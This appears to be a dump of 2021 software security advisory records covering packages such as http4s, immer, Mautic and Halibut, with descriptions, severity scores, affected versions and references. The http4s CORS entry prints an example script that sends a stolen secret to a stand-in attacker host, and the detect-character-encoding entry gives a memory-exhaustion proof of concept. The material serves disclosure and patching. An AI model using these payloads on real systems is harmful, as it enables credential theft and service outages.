### Impact In detect-character-encoding v0.3.0 and earlier, allocated memory is not released. ### Patches The problem has been patched in [detect-character-encoding v0.3.1](https://github.com/sonicdoe/detect-character-encoding/releases/tag/v0.3.1). ### CVSS score [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C) Base Score: 7.5 (High) Temporal Score: 7.2 (High) Since detect-character-encoding is a library, the scoring is based on the “[reasonable worst-case implementation scenario](https://www.first.org/cvss/v3.1/user-guide#3-7-Scoring-Vulnerabilities-in-Software-Libraries-and-Similar)”, namely, using detect-character-encoding in a program accessible over the internet which becomes unavailable when running out of memory. Depending on your specific implementation, the vulnerability’s severity in your program may be different. ### Proof of concept ```js const express = require("express"); const detectCharacterEncoding = require("detect-character-encoding"); const app = express(); app.get("/", (req, res) => { detectCharacterEncoding(Buffer.from("foo")); res.end(); }); app.listen(3000); ``` `hey -n 1000000 http://localhost:3000` ([`hey`](https://github.com/rakyll/hey)) causes the Node.js process to consume more and more memory. ### References - https://github.com/sonicdoe/detect-character-encoding/commit/d44356927b92e3b13e178071bf6d7c671766f588 - https://github.com/sonicdoe/detect-character-encoding/pull/6
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'detect-character-encoding'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/security/advisories/GHSA-5rwj-j5m3-3chj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39176'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/pull/6'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/commit/d44356927b92e3b13e178071bf6d7c671766f588'}, {'type': 'PACKAGE', 'url': 'https://github.com/sonicdoe/detect-character-encoding'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/releases/tag/v0.3.1'}]
{'cwe_ids': ['CWE-401'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T19:58:46Z', 'nvd_published_at': '2021-08-31T18:15:00Z'}
1.4.0
GHSA-44c6-4v22-4mhx
2023-07-11T13:37:50Z
2021-09-20T20:42:25Z
null
['CVE-2021-3795']
semver-regex Regular Expression Denial of Service (ReDOS)
npm `semver-regex` is vulnerable to Inefficient Regular Expression Complexity
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'semver-regex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'semver-regex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.1'}]}], 'versions': ['4.0.0']}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3795'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/semver-regex/commit/11c66245f4e1976dccc52977ed183696a21a3fd7'}, {'type': 'PACKAGE', 'url': 'https://github.com/sindresorhus/semver-regex'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/006624e3-35ac-448f-aab9-7b5183f30e28'}]
{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T17:31:51Z', 'nvd_published_at': '2021-09-15T17:15:00Z'}
1.4.0
GHSA-hpf7-4c2g-9chf
2021-09-30T18:36:14Z
2021-09-23T23:17:07Z
null
['CVE-2021-31819']
Remote Code Execution in Halibut
In Halibut versions prior to 4.4.7 there is a deserialisation vulnerability that could allow remote code execution on systems that already trust each other based on certificate verification.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'NuGet', 'name': 'Halibut'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.7'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31819'}, {'type': 'WEB', 'url': 'https://advisories.octopus.com/adv/2021-08---Remote-Code-Execution-via-Deserialisation-in-the-Halibut-Protocol-(CVE-2021-31819).2250309681.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/OctopusDeploy/Halibut'}]
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-23T17:18:19Z', 'nvd_published_at': '2021-09-22T02:15:00Z'}
1.4.0
GHSA-947x-pv47-pp3q
2021-08-26T15:00:34Z
2021-09-02T17:16:18Z
null
['CVE-2021-39286']
Cross-site scripting in pywb
Webrecorder pywb before 2.6.0 allows XSS because it does not ensure that Jinja2 templates are autoescaped.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'pywb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39286'}, {'type': 'WEB', 'url': 'https://github.com/webrecorder/pywb/commit/f7bd84cdacdd665ff73ae8d09a202f60be2ebae9'}, {'type': 'PACKAGE', 'url': 'https://github.com/webrecorder/pywb'}, {'type': 'WEB', 'url': 'https://github.com/webrecorder/pywb/compare/v-2.5.0...v-2.6.0'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:00:34Z', 'nvd_published_at': '2021-08-18T18:15:00Z'}
1.4.0
GHSA-c8x3-rg72-fwwg
2021-09-14T18:46:53Z
2021-09-08T20:14:38Z
null
['CVE-2021-37218']
Privilege escalation in Hashicorp Nomad
HashiCorp Nomad and Nomad Enterprise Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.0.10 and 1.1.4.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37218'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-21-nomad-raft-rpc-privilege-escalation/29023'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/nomad'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/nomad'}]
{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T18:12:37Z', 'nvd_published_at': '2021-09-07T12:15:00Z'}
1.4.0
GHSA-52cf-226f-rhr6
2021-09-02T18:55:34Z
2021-09-02T16:52:18Z
null
['CVE-2021-39185']
Default CORS config allows any origin with credentials
### Impact #### Origin reflection attack The default CORS configuration is vulnerable to an origin reflection attack. Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com: ```scala val routes: HttpRoutes[F] = HttpRoutes.of { case req if req.pathInfo === "/secret" => Response(Ok).withEntity(password).pure[F] } val app = CORS(routes.orNotFound) ``` The following request is made to our server: ```http GET /secret HTTP/1.1 Host: vulnerable.example.com Origin: https://adversary.example.net Cookie: sessionId=... ``` When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting. Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin: ```http HTTP/1.1 200 OK Access-Control-Allow-Origin: https://adversary.example.org Access-Control-Allow-Credentials: true Content-Type: text/plain p4ssw0rd ``` A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`: ```javascript var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://vulnerable.example.org/secret',true); req.withCredentials = true; req.send(); function reqListener() { location='//bad-people.example.org/log?key='+this.responseText; }; ``` #### Null origin attack The middleware is also susceptible to a Null Origin Attack. A user agent may send `Origin: null` when a request is made from a sandboxed iframe. The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above. ### Patches The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures: ### Migration The `CORS` object exposes a default `CORSPolicy` via `CORS.policy`. This can be configured with various `with*` methods, like any http4s builder. Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware: ```scala val routes: HttpRoutes[F] = ??? val cors = CORS.policy .withAllowOriginAll .withAllowCredentials(false) .apply(routes) ``` ### Workarounds It is possible to be safe in unpatched versions, but note the following defects exist: * The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response. * Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers. * Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches. * Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations. * Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests. This should be harmless in practice. * Needlessly sends `Access-Control-Max-Age` header on non-preflight requests. This should be harmless in practice. * Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header. This should be harmless in practice. #### Explicit origins In versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`. ##### 0.21.x ```scala val routes: HttpRoutes[F] = ??? val config = CORS.DefaultConfig.copy( anyOrigin = false, allowOrigins = Set("http://trusted.example.com") ) val cors = CORS(routes, config) ``` ###### 0.22.x, 0.23.x, 1.x ```scala val routes: HttpRoutes[F] = ??? val config = CORSConfig.default .withAnyOrigin(false) .withAllowedOrigins(Set("http://trusted.example.com")) val cors = CORS(routes, config) ``` #### Disable credentials Alternatively, sharing responses tainted by credentials can be deprecated. ##### 0.21.x ```scala val routes: HttpRoutes[F] = ??? val config = CORS.DefaultConfig.copy(allowCredentials = false) val cors = CORS(routes, config) ``` ##### 0.22.x, 0.23.x, 1.x ```scala val routes: HttpRoutes[F] = ??? val config = CORSConfig.default.withAllowedCredentials(false) val cors = CORS(routes, config) ``` ### References * The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) * [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md) ### For more information If you have any questions or comments about this advisory: * Open an issue in [GitHub](http://github.com/http4s/http4s) * Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.27'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.22.0'}, {'fixed': '0.22.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.23.0'}, {'fixed': '0.23.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39185'}, {'type': 'PACKAGE', 'url': 'https://github.com/http4s/http4s'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/releases/tag/v0.23.2'}]
{'cwe_ids': ['CWE-346'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-01T19:31:53Z', 'nvd_published_at': '2021-09-01T20:15:00Z'}
1.4.0
GHSA-h77f-xxx7-4858
2021-09-07T14:04:02Z
2021-09-07T23:04:04Z
null
['CVE-2021-39177']
User impersonation due to incorrect handling of the login JWT
### Impact <!--_What kind of vulnerability is it? Who is impacted?_--> This allows anyone that can connect to the server to forge a LoginPacket with manipulated JWT token allowing impersonation as any Bedrock user. Unless credentials are saved in your configuration, online mode is not affected as users are still required to log in separately. If your credentials are saved, there is no risk of exposing your email or password. ### Patches <!--_Has the problem been patched? What versions should users upgrade to?_--> This was patched as part of https://github.com/GeyserMC/Geyser/commit/b9541505af68ac7b7c093206ac7b1ba88957a5a6 and https://github.com/GeyserMC/Geyser/commit/ab2f5b326fe590e09167e8b45b4b165ac06ecd13. if your Geyser version is `1.4.2-SNAPSHOT` or later, the issue has been addressed on your build. ### Workarounds <!--_Is there a way for users to fix or remediate the vulnerability without upgrading?_--> Geyser strongly recommends updating to fix this issue. If this isn't possible: - Use online mode and don't save credentials in your Geyser configuration - Use an additional authentication method on the Java server ### References <!--_Are there any links users can visit to find out more?_--> This was disclosed to us by a staff member over at Hive; you can read their disclosure here: https://updates.playhive.com/weekend-maintenance-disclosure-2kJMaY ### For more information If you have any questions or comments about this advisory: * Come talk to us over on our [Discord](https://discord.gg/geysermc) server in the [#development](https://discord.com/channels/613163671870242838/613170125696270357) channel
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.geysermc:connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2-SNAPSHOT'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.1-SNAPSHOT'}}]
[{'type': 'WEB', 'url': 'https://github.com/GeyserMC/Geyser/security/advisories/GHSA-h77f-xxx7-4858'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39177'}, {'type': 'WEB', 'url': 'https://github.com/GeyserMC/Geyser/commit/b9541505af68ac7b7c093206ac7b1ba88957a5a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/GeyserMC/Geyser'}, {'type': 'WEB', 'url': 'https://updates.playhive.com/weekend-maintenance-disclosure-2kJMaY'}]
{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T14:04:02Z', 'nvd_published_at': '2021-08-30T23:15:00Z'}
1.4.0
GHSA-49x3-8228-3w3m
2021-09-20T18:59:46Z
2021-09-20T20:18:39Z
null
['CVE-2021-3810']
Inefficient Regular Expression Complexity in code-server
code-server is vulnerable to Inefficient Regular Expression Complexity
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'code-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.12.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3810'}, {'type': 'WEB', 'url': 'https://github.com/cdr/code-server/commit/ca617df135e78833f93c8320cb2d2cf8bba809f5'}, {'type': 'PACKAGE', 'url': 'https://github.com/cdr/code-server'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/38888513-30fc-4d8f-805d-34070d60e223'}]
{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-20T18:59:46Z', 'nvd_published_at': '2021-09-17T07:15:00Z'}
1.4.0
GHSA-v9w2-v7j9-rjpr
2021-09-13T20:27:30Z
2021-09-02T22:02:36Z
null
['CVE-2021-34435']
Remote code execution in Eclipse Theia
In Eclipse Theia 0.3.9 to 1.8.1, the "mini-browser" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': '@theia/mini-browser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.9'}, {'fixed': '1.9.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34435'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/pull/8759'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/commit/0761dcf5fe3c14c27432683d42d2c526ad0cfbd5'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=568018'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-theia/theia'}]
{'cwe_ids': ['CWE-346', 'CWE-668', 'CWE-942'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-02T17:12:13Z', 'nvd_published_at': '2021-09-01T18:15:00Z'}
1.4.0
GHSA-c36v-fmgq-m8hx
2022-09-11T22:24:21Z
2021-09-07T22:57:14Z
null
['CVE-2021-3757']
Prototype Pollution in immer
immer is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'immer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3757'}, {'type': 'WEB', 'url': 'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237'}, {'type': 'PACKAGE', 'url': 'https://github.com/immerjs/immer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/23d38099-71cd-42ed-a77a-71e68094adfa'}]
{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-03T20:17:21Z', 'nvd_published_at': '2021-09-02T12:15:00Z'}
1.4.0
GHSA-356r-77q8-f64f
2021-09-30T18:35:17Z
2021-09-29T17:12:37Z
null
['CVE-2021-3819']
Cross-Site Request Forgery in firefly-iii
firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF). This has been mitigated in version 5.6.1
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/578f350498b75f31d321c78a608c7f7b3b7b07e9'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/da82f7b6-4ffc-4109-87a4-a2a790bd44e5'}]
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T20:06:09Z', 'nvd_published_at': '2021-09-27T13:15:00Z'}
1.4.0
GHSA-g485-29gq-6h2h
2021-08-30T18:51:00Z
2021-09-01T18:36:24Z
null
['CVE-2021-36786']
Sensitive Data Exposure in miniorange_saml
The miniorange_saml (aka Miniorange Saml) extension before 1.4.3 for TYPO3 allows Sensitive Data Exposure of API credentials and private keys.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'miniorange/miniorange-saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36786'}, {'type': 'PACKAGE', 'url': 'https://github.com/miniOrangeDev/miniorange-saml-typo3-sso'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-011'}]
{'cwe_ids': ['CWE-922'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:51:00Z', 'nvd_published_at': '2021-08-13T17:15:00Z'}
1.4.0
GHSA-86pv-95mj-7w5f
2021-08-30T18:05:04Z
2021-09-01T18:40:48Z
null
['CVE-2021-27910']
Stored XSS vulnerability on Bounce Management Callback
### Impact Insufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback function. The values submitted in the "error" and "error_related_to" parameters of the POST request of the bounce management callback will be permanently stored and executed once the details page of an affected lead is opened by a Mautic user. An attacker with access to the bounce management callback function (identified with the Mailjet webhook, but it is assumed this will work uniformly across all kinds of webhooks) can inject arbitrary JavaScript Code into the "error" and "error_related_to" parameters of the POST request (POST /mailer/<product / webhook>/callback). It is noted that there is no authentication needed to access this function. The JavaScript Code is stored permanently in the web application and executed every time an authenticated user views the details page of a single contact / lead in Mautic. This means, arbitrary code can be executed to, e.g., steal or tamper with information. ### Patches Upgrade to 3.3.4 or 4.0.0 ### Workarounds No ### References https://github.com/mautic/mautic/releases/tag/3.3.4 https://github.com/mautic/mautic/releases/tag/4.0.0 ### For more information If you have any questions or comments about this advisory: * Email us at [security@mautic.org](mailto:security@mautic.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'mautic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/mautic/mautic/security/advisories/GHSA-86pv-95mj-7w5f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27910'}, {'type': 'WEB', 'url': 'https://github.com/mautic/mautic/commit/e6a405975342f3cf86aa71927618d31d25135fa3'}, {'type': 'PACKAGE', 'url': 'https://github.com/mautic/mautic'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:05:04Z', 'nvd_published_at': '2021-08-30T16:15:00Z'}
1.4.0
GHSA-hq3v-rg6f-6hx4
2021-08-30T20:28:40Z
2021-09-01T18:35:34Z
null
['CVE-2021-3689']
Use of Insufficiently Random Values in yiisoft/yii2-dev
yii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'yiisoft/yii2-dev'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.43'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3689'}, {'type': 'WEB', 'url': 'https://github.com/yiisoft/yii2/commit/13f27e4d920a05d53236139e8b07007acd046a46'}, {'type': 'PACKAGE', 'url': 'https://github.com/yiisoft/yii2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/50aad1d4-eb00-4573-b8a4-dbe38e2c229f'}]
{'cwe_ids': ['CWE-330'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T20:28:40Z', 'nvd_published_at': '2021-08-10T11:15:00Z'}
1.4.0
GHSA-3q6g-vf58-7m4g
2021-09-21T14:51:23Z
2021-09-08T15:41:15Z
null
['CVE-2021-32838']
Regular Expression Denial of Service in flask-restx
Flask RESTX contains a regular expression that is vulnerable to [ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) (Regular Expression Denial of Service) in `email_regex`.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'flask-restx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/python-restx/flask-restx/security/advisories/GHSA-3q6g-vf58-7m4g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32838'}, {'type': 'WEB', 'url': 'https://github.com/python-restx/flask-restx/issues/372'}, {'type': 'WEB', 'url': 'https://github.com/python-restx/flask-restx/commit/bab31e085f355dd73858fd3715f7ed71849656da'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-3q6g-vf58-7m4g'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-restx/flask-restx'}, {'type': 'WEB', 'url': 'https://github.com/python-restx/flask-restx/blob/fd99fe11a88531f5f3441a278f7020589f9d2cc0/flask_restx/inputs.py#L51'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5UCTFVDU3677B5OBGK4EF5NMUPJLL6SQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QUD6SWZLX52AAZUHDETJ2CDMQGEPGFL3/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/flask-restx/'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T14:24:52Z', 'nvd_published_at': '2021-09-20T18:15:00Z'}
1.4.0
GHSA-45w7-7g63-2m5w
2023-06-13T20:53:05Z
2021-09-01T18:30:55Z
null
['CVE-2021-28035']
Drop of uninitialized memory in stack_dst
Affected versions of stack_dst used a push_inner function that increased the internal length of the array and then called val.clone(). If the val.clone() call panics, the stack could drop an already dropped element or drop uninitialized memory. This issue was fixed in `2a4d538` by increasing the length of the array after elements are cloned.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'stack_dst'}, 'ecosystem_specific': {'affected_functions': ['stack_dst::StackA::push_cloned']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28035'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/issues/5'}, {'type': 'WEB', 'url': 'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d538'}, {'type': 'PACKAGE', 'url': 'https://github.com/thepowersgang/stack_dst-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0033.html'}]
{'cwe_ids': ['CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:56:02Z', 'nvd_published_at': '2021-03-05T09:15:00Z'}
1.4.0
GHSA-58g2-9fqr-36q2
2021-09-10T17:08:40Z
2021-09-02T22:01:01Z
null
['CVE-2021-23426']
Prototype Pollution in Proto
This affects all versions of package Proto. It is possible to inject pollute the object property of an application using Proto by leveraging the merge function.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'Proto'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23426'}, {'type': 'PACKAGE', 'url': 'https://github.com/adriancmiranda/Proto'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PROTO-1316301'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/Proto'}]
{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-02T17:04:55Z', 'nvd_published_at': '2021-09-01T15:15:00Z'}
1.4.0
GHSA-33f9-j839-rf8h
2023-09-11T22:29:53Z
2021-09-02T17:17:37Z
null
['CVE-2021-23436']
Prototype Pollution in immer
This affects the package immer before 9.0.6. A type confusion vulnerability can lead to a bypass of CVE-2020-28477 when the user-provided keys used in the path parameter are arrays. In particular, this bypass is possible because the condition `(p === "__proto__" || p === "constructor")` in `applyPatches_` returns false if `p` is `['__proto__']` (or `['constructor']`). The `===` operator (strict equality operator) returns false if the operands have different type.
